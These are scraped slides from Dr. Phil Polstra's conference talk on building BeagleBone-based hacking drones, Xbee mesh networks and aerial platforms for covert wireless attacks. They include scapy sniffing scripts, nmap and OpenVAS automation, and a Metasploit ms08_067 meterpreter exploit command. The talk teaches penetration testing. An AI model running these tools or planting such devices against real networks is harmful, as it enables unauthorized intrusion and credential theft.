autonomous remote hacking drones - dr. phil polstra
Post on 13-May-2015
1.396 Views
Preview:
DESCRIPTION
TRANSCRIPT
Dr. Phil Polstra@ppolstra
Bloomsburg University of Pennsylvania
Autonomous Remote Hacking Drones
What is this talk about?l Hacking and/or forensics with small, low-power devicesl ARM-based Beagleboard & Beaglebone running full suite of
security/forensics toolsl Performing coordinated attacks with networks of devicesl Using aerial drones for performing and supporting attacksl Leveraging Python to make attack semi-autonomous
Why You Should Carel A full-featured Linux install for flexibilityl Low-power devices can run for days on battery powerl Small devices can be planted for later retrievall Network of devices enhances hacking from a distancel Aerial drone can be flown around target
l Can be useful for initial reconnaissancel May be only practical way to access certain targets
l Aerial drone can be landed nearby (roof?)l Remote hacking dronel Router for other drones planted nearbyl Combination router and drone
Who am I?
l Professor at Bloomsburg University of Pennsylvanial Programming from age 8l Hacking hardware from age 12l Also known to fly and build airplanes
5
Roadmapl Choosing a hacking platforml Aircraft choicesl The Deck – your new favorite pen testing distrol Solo ops with The Deckl Networking with 802.15.4l Building Dronesl Attacking with an army of devices running The Deckl Aerial drone scenariosl Making attacks more autonomous with Python
6
Choosing a Hacking Platforml Smalll Low-powerl Affordablel Maturel Networking built inl Good USB supportl Convenient input and output
7
And the Winning Platform is...l BeagleBone Black
l 3.4” x 2.1”l <10 Watts (board itself <2 W)l Only $45l Based on 1GHz Cortex A8l 512MB RAMl 100 Mbps Ethernet built inl high-speed USB plus USB-on-the-gol HDMI and LCD outputl RS-232, webcam, plentiful GPIO, and microSD
BeagleBone Black (aka Raspberry Pi killer)
I know at least one of you will ask...
l Why not Raspberry Pi?l Not as powerfull Doesn't run Ubuntu (ARM6 not supported)l Not truly open (Broadcom won't release info)l Not as maturel Raspberry Pi cost more to build full systeml Still limited availability (especially in USA)l Not as reliable (reported quality and power issues)l Inefficient – uses more power despite running at lower clock speedl Limited GPIOl GPIO is not buffered (easy to fry boards)l Fragile design (pins vs. headers)l Not as compact
10
Choosing an Aircraftl Good payloadl Can fly in windy conditionsl Capable of vertical takeoff/landing (VTOL)l Reasonable flight timel Space for BeagleBone Blackl Space for Xbeel Space for Alfa wifi adapterl Affordable
11
And the winning aircraft is...
12
Quadshotl Flying wing with VTOLl Good wind tolerancel Half a pound of payloadl Flight as an airplane is more energy efficient and
helps in high winds (8-15 minutes)l Some models use Xbeel Built in camera mount
The Deck – Your New Favorite Distro
l Originally developed for BeagleBoard-xMl Ported to run on BeagleBone Blackl Optimized for the Beagles
l Not someone's half-way effort to port desktop distrol Desktop or drone
l All the packages you need (over 1600)l Based on Ubuntu
l Good repository supportl Good community supportl Minimizes need to build tools from source
l Running latest kernels
14
Demo 1 – Our Favorite Exploit
15
Demo 1 (contd.)
16
Demo 1 (contd.)
17
Demo 2 – Wifi Cracking
18
Demo 2 (contd.)
19
Demo 2 (contd.)
20
Demo 3 – Password Cracking
21
Demo 4 – WPS Cracking
22
Demo 4 (contd.)
23
Demo 5 – Pwn Win7 Like Its a Mac
24
Demo 5 (contd.)
25
Demo 6 – Clickiddiestm
26
802.15.4 Networkingl Basicsl Hardwarel Simple case: 2 Xbee adaptersl Slightly harder case: multiple adapters one at a timel Hard case: multiple adapters simultaneouslyl Really Hard case: true mesh network
27
802.15.4 Basicsl Typically used in low-power embedded systemsl Regular (300') and Pro (1 mi) versionsl AT and API modes of operationl Low-speed (250 kbps max)l Supports multiple network topologies
l Peer to Peerl Starl Mesh
28
Xbee Hardware
29
Xbee Hardware (contd)
l Manufactured by Digil Regular and Pro formats are interchangeable and inter-operablel Power consumption at 3.3V is 50/295 mA for regular/prol Uses 2 mm pin spacing
l Most breadboards are 0.1” or 2.54 mml Requires an adapter
l Several antenna optionsl Be careful not to mix S1 with S2 (ZB) series which are the
same dimensions, but are not compatible
30
Series 1 vs. Series 2l Series 1 (the original)
l Slightly higher power consumption (50 vs 40 mA) for regular version
l Works out of the boxl Not true mesh networking
l Series 2 (2B and ZB)l Must have firmware loaded for each function (coordinator, router,
end device)l Every network must have a coordinatorl Coordinators and routers may not go to sleepl Recommended for larger pen tests
Simple Case: 2 Xbee Adaptersl Xbee modules must be configured for desired network
topologyl Digi provides X-CTU software for configuration, but
it only runs on Windows (or use Wine)l Recently Moltosenso has released Network Manager
IRON 1.0 which runs on Linux, Mac, and Windows – free edition is sufficient for our limited usage
32
Configuring Xbee Modulesl Place Xbee module in USB adapter and connect to PC running X-CTU or
IRONl Select correct USB port and set baud rate (default is 9600)l From Modem Configuration tab select Read to get current configurationl Ensure modem is XB24 and Function Set is XBEE 802.15.4 for Series 1l Set the channel and PAN ID (1337?) noting the settings which must be the
same for all modemsl Pick a Destination Low and Destination High address for the other adapter
(say 2 and 0)l Set the My Address to a chosen value (say 01)l Click Write to stored the new config on the Xbeel Repeat this process on the second Xbee but reverse the addressesl The modules should now talk to each other just fine
Configuring Xbee Modules (contd)
34
Simple Case: Accessing your single drone
l By default Xbee adapters operate in transparent mode
l Setup TTY on drone and you can login in with terminal programl Simplel Works with interactive programsl If you go out of range you are still connected when
you return
35
Starting TTY on your dronel Create a file with the following in /etc/init# ttyO2 - getty# This service maintains a getty on ttyO2 from the point the system is# started until it is shut down again.start on stopped rc RUNLEVEL=[2345]stop on runlevel [!2345]respawnexec /sbin/getty -8 57600 ttyO2l Start with “sudo start ttyO2” (letter O not a zero!)l Use favorite terminal program to connect
36
Slightly Harder Case: Multiple Drones One at a Time
l Configure drones as with the single drone case but with different MY addresses
l Use terminal program on command console to connect to drones one at a time
l Simple: no programming requiredl Must enter AT command mode to switch between drones
l Enter “+++” (no enter) and wait for OKl Enter “ATDL0002 <enter>” to select drone 2l Enter “ATWR <enter>” to write to NVRAMl Enter “ATCN <enter>” to exit command mode
37
Slightly Harder Case: Multiple Drones Simultaneously
l API mode is used vs. AT model Configure Xbee with X-CTU
l For Series 1 stick with 802.15.4 Function Setl For Series 2 (ZB)l Drones set to Function Set ZNET 2.5
ROUTER/ENDDEVICE API 1347l Controller set to Function Set ZNET 2.5
COORDINATOR API 1147l Router can be used to extend range to command console
l Multiple choices for communicationl Java xbee-apil Python-xbee (what I used)l Raw commands to TTY device
l Recommended for most situations involving 3 or more devices
38
Multiple Drone Communications
l Really this is a point-to-multipoint topologyl For each drone communication appears to be simple
peer-to-peerl API mode provides better performance and allows
simpler software operation
39
Multiple Drones Using Python: One Possibility
l Each drone runs a simple Python script which waits for commands and sends announcements
l Controller listens for announcements/responses and sends commands (all activity is logged)
l Upside is that it lends itself easily to scriptingl Downside is that it doesn't support interactive shells
(yet)l Announcements can be sent to controller for
important events (such as successful cracking)l Code is available at https://github.com/ppolstra
40
Harder Case: True Mesh Network
l Recommended when using larger number of drones or when devices are too far apart
l Devices configured as routers or coordinators will have reduced battery life (no sleep)
l Requires series 2 (2B or ZB) Xbee adaptersl No changes to scripts are required
41
True Mesh Networking (contd)l At least one modem must have coordinator
firmwarel Routers can extend range
l Pro adapters recommendedl Drones can use regular adapters to save powerl Routers need not be connected to a Drone
l Easier to leverage Xbee adapter sleep modes on end devices
42
Building Drones
43
Getting The Deckl Download the archive from
http://sourceforge.net/projects/thedeck/l Also download the MeshDeck if using 802.15.4l Note apt archives removed to save 1.7GB of space
l Upload The Deck to microSD cardl Class 10 8GB or largerl Extract archive to your Linux boxl From your Linux box “sudo ./setup_sd.sh –mmc
/dev/sdX –uboot bone”l Will take a while (20-30 minutes)
l Ready to run microSD cards are also available at https://specialcomp.com/beagleboard/thedeck.htm
l If running the MeshDeckl Extract the archive to the dronel Run the install script
44
Power Your Drones
l Beagles take standard 2.1 x 5.5 mm barrel connectorl Battery voltage above 5V is wasted as heatl Bare board can run for several days off standard batteries (~220mA)l LCD touchscreens require lots of power!l Leaching off of USB power from a target is ideall Be careful with WiFi and 802.15.4
l Set transmit power to minimuml Take advantage of sleep modes on 802.15.4 radios
45
Power Options
Battery Size
Approx. Runtime
D 54.5 hrs
C 27.3 hrs
AA 13.6 hrs
9V or AAA 6.8 hrs
Latern 50 hrs
USB 5200 23.6 hrs
46
802.15.4 Hardware
47
802.15.4 Hardware
48
Xbee Adapters
l UART (serial) adaptersl Can be wired directly to Beagles using 4 wiresl Don't take up USB ports
l Xbee cape out soon
49
Xbee Adapters (contd)
l USB Adaptersl More expensivel Helpful for initial setup of modeml Easier to setup: just plug it inl Laptop connection
50
Wiring the Xbee to Beagles
If you splurged for the USB adapter you can just plug in to a USB port
l BeagleBone has only 1 USB port which you might want for something else (WiFi?)
l BeagleBoard has 4 USB portsl Using the UART interface slightly more
complicatedl Connect 4 wires: 3.3V, Ground, TX, RXl Configure the Beagle multiplexer for proper
operationl If you have an Xbee cape just plug it in
51
Setting up a UART Interface
l Appropriate pins & modes in Beagle manualsl For BeagleBone UART2
l 3.3V & Ground P9 pin 3 & 1, respectivelyl TX P9 pin 21 (to Xbee Din)l RX P9 pin 22 (to Xbee Dout)
l Add the following lines to /etc/rc.local BEFORE the exit 0 at the end:l # setup the MeshDeck dronel echo BB-UART2 > /sys/devices/bone_capemgr.8/slotsl sleep 2l /etc/init.d/meshdeckd start
52
Capes
l Work in progressl Xbee cape with socket for Xbee radiol Pwnage capel Xbee socketl Network switch for installing inlinel USB hubl Optional 802.11 wirelessl AirDeck cape to fly aerial drone
53
Containers
54
Containers
55
Plantables
56
Plantables
57
Building the AirDeckl If you only want a router to extend range
l Buy the Xbee board from Transition Roboticsl Program the Xbee modem as a routerl Install the board
l To install a drone on the Quadshot will needl BBBl Xbee modeml Xbee cape (either DIY or purchased)l Alfa AWUS036H wireless adapterl 2.1 x 5.5 mm barrel connector for powerl Short (3-6”) microUSB A-B cable
58
AirDeck (contd)
l Entire setup installed on brain coverl Place BBB on cover as shown mark 4 hole locations with 1/8” drill bitl Connect to lid using 4-40 screws and standoffs or similarl 3 nuts per screw
l 1 on outside to secure screwl 2 to lock BBB on lid
59
AirDeck (contd)
l Remove the BBB from the lidl Take the Alfa out of its casel Test fit it to the inside of the cover as
shownl Mark the location of 3/8” hole for antennal Drill the 3/8” hole then install on lid to mark
mount holesl Drill mount holes
l Install with 4-40 screwsl Seal with black tape to prevent shorting with LIA
board
60
AirDeck (contd)l Cut notches for power cable and USB cable as shown
in pictures using rotary tooll You may have to cut back the hard plastic and/or
metal shield on USB cablel Solder the 2.1 x 5.5 barrel connector
l Center is connected to Vcc on LIAl Outer conductor is connected to Ground on LIAl UART connectors on upper left are probably best
choice for connectionl Install Xbee cape and secure with cable tiesl Install lid and plug in barrel connectorl Go forth and pwn!
61
AirDeck Ready for Pwnage
Networked attacks – Simplest Case
l In the simplest case there is only 1 dronel Networking is peer-to-peerl Allows hacking from a distance
l Better WiFi hacking when drone is in buildingl Drone runs 24x7l Drone can run for days off batteryl Important updates such as successfully cracked passwords
can be sent to master periodically in case you weren't in range when they happened
l Drone has full version of The Deck – lots of possibilitiesl Less conspicuous than sitting outside the buildingl If you are lucky you can patch into wired networkl If you are extra lucky they use Power Over Ethernet!
63
Networked Attack with Multiple Drones
l One process on master monitors status updates from all drones
l Interactive shell into each dronel Multiple subshells can be createdl Processing continues if master disconnects
l Endless possibilities since each drone has full version of The Deck
l Drone are easily retasked based on objectives achieved by other drones
64
Demo 7 - Trivial example of Two Drones in TTY Mode
65Demo 8 - Trivial Example with Two Drone – API Mode Using Python
66
Python Mode (continued)
67
Python Mode (continued)
68
Python Mode (continued)
69
AirDeck Scenario 1l Router only mode
l Used to extend the range of drones planted nearby target
l Drones may be using regular Xbee adapters to save powerl Flyby if there are no good landing spots nearbyl Land if possiblel Flat roof could be good choicel Router can run for days off Quadshot battery
70
AirDeck Scenario 2l AirDeck is only drone
l Useful when drones can't be easily plantedl Battery on Quadshot allows extended operationl Best situation allows you to land on a roof where
the AirDeck isn't detectedl If you screw up and crash on the roof you may
still be able to retrieve “your RC toy” from target later
71
AirDeck Scenario 3l AirDeck combined with other dronesl Other drones are planted
l Inside leeching power from targetl Outside running off of batteryl Other drones likely using regular Xbee adapters to save
powerl AirDeck Xbee adapter configured as a coordinator
or router
Automating with Python
from scapy.all import *# create a list to store networksap_list = []# define a function to be called with each received packetdef packet_handler(pkt) : # is this a (802.11) packet, in particular a beacon frame if pkt.haslayer(Dot11) and pkt.type == 0 and pkt.subtype == 8 : # is this a network that I used to know? if pkt.addr2 not in ap_list : ap_list.append(pkt.addr2) print "Network %s with ESSID %s detected on channel %s " % (pkt.addr2, pkt.info, str(ord(pkt[Dot11Elt:3].info)))# main function sniffs for a minute then exits def main() : print "Sniffing for wireless networks" sniff(iface="mon0", prn=packet_handler, timeout=60) print "All done"if __name__ == '__main__' : main()
Detecting Wireless Networks
from scapy.all import *import optparse# create a list to store networksclient_list = []pkt_list = []# define a function to be called with each received packetdef packet_handler(pkt) : # is this a (802.11) packet, in particular a beacon frame if pkt.haslayer(Dot11) : pkt_list.append(pkt) # is this a client that I used to know? if pkt.addr2 not in client_list : client_list.append(pkt.addr2) print "Client: " + str(pkt.addr2) + " detected"
Capturing Wireless Packets
def main() : # parse command line options parser = optparse.OptionParser('usage %prog -b <BSSID> -e <ESSID>') parser.add_option('-b', dest='bssid', type='string', help='target BSSID') parser.add_option('-e', dest='essid', type='string', help='target ESSID') (options, args) = parser.parse_args() bssid = options.bssid essid = options.essid # if essid and bssid aren't specified exit if (essid == None ) | (bssid == None): print parser.usage exit(0) print "Capturing traffic for ESSID:%s BSSID:%s" % (essid, bssid) sniff(iface="mon0", prn=packet_handler, timeout=60) pktcap = PcapWriter(essid + '.pcap', append=True, sync=True) pktcap.write(pkt_list) pktcap.close() print "All done" exit(0)if __name__ == '__main__' : main()
Capturing Wireless Packets(contd)
Finding Out What’s Thereimport nmap, optparse, jsonihost_list = []def main() : # parse command line options parser = optparse.OptionParser('usage %prog -t <target host or network> -p <ports> -o <nmap options>') parser.add_option('-t', dest='target_net', type='string', help='target host or network') parser.add_option('-o', dest='nmops', type='string', help='additional nmap options') parser.add_option('-p', dest='ports', type='string', help='port(s) to scan') (options, args) = parser.parse_args() target_net = options.target_net nmops = options.nmops ports = options.ports # if no target is specified then exit if target_net == None : print parser.usage exit(0) # now perform the scan nm = nmap.PortScanner() # if arguments and ports aren't specified use some defaults if ports == None : ports = '1-1024' if nmops == None : nmops = '-sV -O' nm.scan(target_net, ports, nmops)
Finding Out What’s There (contd) #print the results for host in nm.all_hosts() : # if it isn't up don't bother to print anything about it if nm[host]['status']['state'] == 'up' : host_list.append(nm[host]) print '---------------------------------' if nm[host].has_key('addresses') : print "live host detected at %s " % (nm[host]['addresses']['ipv4']) else :print "live host detected at %s " % (nm[host]['hostname']) # now iterate over services if 'tcp' in nm[host].keys() :print 'TCP services detected on the following ports:'for port in nm[host]['tcp'] : print "Port: " + str(port) for k, v in nm[host]['tcp'][port].items() : print " " + str(k) + ": " + str(v) if 'udp' in nm[host].keys() :print 'UDP services detected on the following ports:'for port in nm[host]['udp'] : print "Port: " + str(port) for k, v in nm[host]['udp'][port].items() : print " " + str(k) + ": " + str(v) fp = open('nmap-scan.json', 'wb') json.dump(host_list, fp) fp.close() if __name__ == '__main__' : main()
import optparse, json, time, xml.etree.ElementTree as EThost_list = []def main() : # parse command line options parser = optparse.OptionParser('usage %prog -u <OpenVAS user> -p <OpenVAS password> -h <OpenVAS host>') parser.add_option('-u', dest='user', type='string', help='OpenVAS user') parser.add_option('-h', dest='ovhost', type='string', help='OpenVAS host, default is localhost') parser.add_option('-p', dest='password', type='string', help='OpenVAS password') (options, args) = parser.parse_args() user = options.user password = options.password ovhost = options.ovhost # if no user specified then exit if user == None : print parser.usage exit(0) if ovhost == None : ovhost = 'localhost' # load the host list from JSON file fp = open('nmap-scan.json', 'rb') host_list = json.load(fp) fp.close()
Detecting the Vulnerable
Detecting the Vulnerable (contd)# create the list of targets from nmap scan results targets = "" for host in host_list : targets += str(host['addresses']['ipv4']) + ',' targets = rstrip(targets, ',') # now do the scan manager = openvas.omplib.OMPClient(host=ovhost) manager.open(user, password) manager.create_target('nmap-targets', targets, 'targets detected by previous nmap scan') task_id = manager.create_task('openvas-scan', target='nmap-targets') report_id = manager.start_task(task_id) # it will take some time for this scan to run so check every minute while True : time.sleep(60) status = manager.get_task_status(task=task_id) if "done" in status.itervalues() : break report = manager.get_report(report_id) print ET.tostring(report) if __name__ == '__main__' : main()
General formatmsfcli /exploit/platform/type/exploit RHOST=<target address> PAYLOAD=platform/payload/bind_method OPTIONX=something OPTIONY=somethingl I.E.msfcli exploit/windows/smb/ms08_067_netapi RHOST=192.168.10.103 PAYLOAD=windows/meterpreter/bind_tcp
Script-based Exploitation
81
Future Directionsl Continue to add useful packages as need
arisesl Optimize some packages for BB-xM/BBBl Optimize and expand 802.15.4 codel Other output devicesl Exploit USB OTG functionalityl Replace LIA autopilot with BBB in AirDeck
dronel Hack over the Internet with 802.15.4 gateway
82
Coming Soon
Use coupon Code CNF314For 30% offThis and ANYSyngress title
..
Questions?Feel free to track me down during the con or @ppolstra
later
top related